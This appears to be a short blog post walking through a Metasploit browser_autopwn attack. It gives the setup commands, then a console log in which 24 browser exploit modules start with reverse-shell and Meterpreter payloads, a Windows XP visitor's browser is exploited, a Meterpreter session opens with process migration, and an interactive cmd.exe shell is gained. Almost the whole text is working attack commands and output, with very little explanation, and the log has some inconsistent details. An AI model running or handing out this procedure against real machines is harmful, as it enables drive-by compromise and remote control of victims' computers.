control – metasploit browser_autopwn

Once you run exploit a client will need to browse to the url http://192.168.1.2:80/1

This will not bypass AV

use auxiliary/server/browser_autopwn

set lhost 192.168.1.2

set srvport 8080

set uripath /1

msf auxiliary(browser_autopwn) > run

[*] Auxiliary module execution completed

[*] Setup

[*] Obfuscating initial javascript 2011-02-23 15:01:37 +0100

msf auxiliary(browser_autopwn) > [*] Done in 1.510720899 seconds

[*] Starting exploit modules on host 192.168.1.2…

[*] —

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp

[*] Using URL: http://0.0.0.0:80/CSliqBLbAetJg

[*] Local IP: http://192.168.1.2:80/CSliqBLbAetJg

[*] Server started.

[*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:80/jUdrG

[*] Local IP: http://192.168.1.2:80/jUdrG

[*] Server started.

[*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:80/zOSzOCpOGIe

[*] Local IP: http://192.168.1.2:80/zOSzOCpOGIe

[*] Server started.

[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp

[*] Using URL: http://0.0.0.0:80/jzewIknlw

[*] Local IP: http://192.168.1.2:80/jzewIknlw

[*] Server started.

[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp

[*] Using URL: http://0.0.0.0:80/XOZQPjQ

[*] Local IP: http://192.168.1.2:80/XOZQPjQ

[*] Server started.

[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp

[*] Using URL: http://0.0.0.0:80/MXnujRr

[*] Local IP: http://192.168.1.2:80/MXnujRr

[*] Server started.

[*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp

[*] Using URL: http://0.0.0.0:80/ywaepj

[*] Local IP: http://192.168.1.2:80/ywaepj

[*] Server started.

[*] Starting exploit osx/browser/mozilla_mchannel with payload generic/shell_reverse_tcp

[*] Using URL: http://0.0.0.0:80/pAAqdtCSCDS

[*] Local IP: http://192.168.1.2:80/pAAqdtCSCDS

[*] Server started.

[*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp

[*] Using URL: http://0.0.0.0:80/haCqxLlurtEq

[*] Local IP: http://192.168.1.2:80/haCqxLlurtEq

[*] Server started.

[*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:80/hyCntoHSSHiS

[*] Local IP: http://192.168.1.2:80/hyCntoHSSHiS

[*] Server started.

[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:80/Muoazv

[*] Local IP: http://192.168.1.2:80/Muoazv

[*] Server started.

[*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:80/nfvpMMmFMePdG

[*] Local IP: http://192.168.1.2:80/nfvpMMmFMePdG

[*] Server started.

[*] Starting exploit windows/browser/blackice_downloadimagefileurl with payload windows/meterpreter/reverse_tcp

[*] Starting exploit windows/browser/enjoysapgui_comp_download with payload windows/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:80/bWrpEnXiDwN

[*] Local IP: http://192.168.1.2:80/bWrpEnXiDwN

[*] Server started.

[*] Using URL: http://0.0.0.0:80/hkAcMF

[*] Local IP: http://192.168.1.2:80/hkAcMF

[*] Server started.

[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:80/nHoGVKWjGZ

[*] Local IP: http://192.168.1.2:80/nHoGVKWjGZ

[*] Server started.

[*] Starting exploit windows/browser/mozilla_interleaved_write with payload windows/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:80/fHJEEPcrAE

[*] Local IP: http://192.168.1.2:80/fHJEEPcrAE

[*] Server started.

[*] Starting exploit windows/browser/mozilla_mchannel with payload windows/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:80/gqKmIgrabr

[*] Local IP: http://192.168.1.2:80/gqKmIgrabr

[*] Server started.

[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:80/PXcSdO

[*] Local IP: http://192.168.1.2:80/PXcSdO

[*] Server started.

[*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:80/QbyGUCn

[*] Local IP: http://192.168.1.2:80/QbyGUCn

[*] Server started.

[*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:80/MnaySlKoxhHWd

[*] Local IP: http://192.168.1.2:80/MnaySlKoxhHWd

[*] Server started.

[*] Starting exploit windows/browser/ms11_003_ie_css_import with payload windows/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:80/oJvBxKmhgmWkQ

[*] Local IP: http://192.168.1.2:80/oJvBxKmhgmWkQ

[*] Server started.

[*] Starting exploit windows/browser/ms11_050_mshtml_cobjectelement with payload windows/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:80/KXQG

[*] Local IP: http://192.168.1.2:80/KXQG

[*] Server started.

[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:80/VMexpRuenG

[*] Local IP: http://192.168.1.2:80/VMexpRuenG

[*] Server started.

[*] Starting exploit windows/browser/wmi_admintools with payload windows/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:80/TDbswvly

[*] Local IP: http://192.168.1.2:80/TDbswvly

[*] Server started.

[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333

[*] Starting handler for generic/shell_reverse_tcp on port 6666

[*] Started reverse handler on 192.168.1.2:3333

[*] Starting the payload handler…

[*] Starting handler for java/meterpreter/reverse_tcp on port 7777

[*] Started reverse handler on 192.168.1.2:6666

[*] Started reverse handler on 192.168.1.2:7777

[*] Starting the payload handler…

[*] Starting the payload handler…

[*] — Done, found 24 exploit modules

[*] Using URL: http://0.0.0.0:80/1

[*] Local IP: http://192.168.1.2:80/1

[*] Server started.

[*] 192.168.20.42 Browser Autopwn request ‘/1’

[*] 192.168.20.42 Browser Autopwn request ‘/1?sessid=TWljcm9zb2Z0IFdpbmRvd3M6WFA6U1AzOmVuLWdiOng4NjpNU0lFOjcuMDo%3d’

[*] 192.168.20.42 JavaScript Report: Microsoft Windows:XP:SP3:en-gb:x86:MSIE:7.0:

[*] 192.168.20.42 Reporting: {:os_name=>”Microsoft Windows”, : os_flavor=>”XP”, : os_sp=>”SP3″, : os_lang=>”jp-jp”, :arch=>”x86″}

[*] Responding with exploits

[*] Sending MS03-020 Internet Explorer Object Type to 192.168.20.42:1063…

[-] Exception handling request: Connection reset by peer

[*] Sending MS03-020 Internet Explorer Object Type to 192.168.20.42:1064…

[*] Sending Internet Explorer DHTML Behaviors Use After Free to 192.168.20.42:1065 (target: IE 6 SP0-SP2 (onclick))…

[*] Sending stage (752128 bytes) to 192.168.20.42

[*] Meterpreter session 1 opened (192.168.1.2:3333 -> 192.168.20.42:1066) at 2012-04-23 15:02:41 +0100

[*] Session ID 1 (192.168.1.2:3333 -> 192.168.20.42:1066) processing InitialAutoRunScript ‘migrate -f’

[*] Current server process: IEXPLORE.EXE (3928)

[*] Spawning notepad.exe process to migrate to

l[+] Migrating to 644

[+] Successfully migrated to process

Interrupt: use the ‘exit’ command to quit

msf auxiliary(browser_autopwn) > sessions -i 1

[*] Starting interaction with 1…

meterpreter > execute -f cmd.exe -c

Process 1096 created.

Channel 1 created.

meterpreter > interact 1

Interacting with channel 1…

Microsoft Windows XP [Version 4.1.2061]

(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\11\Desktop>

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s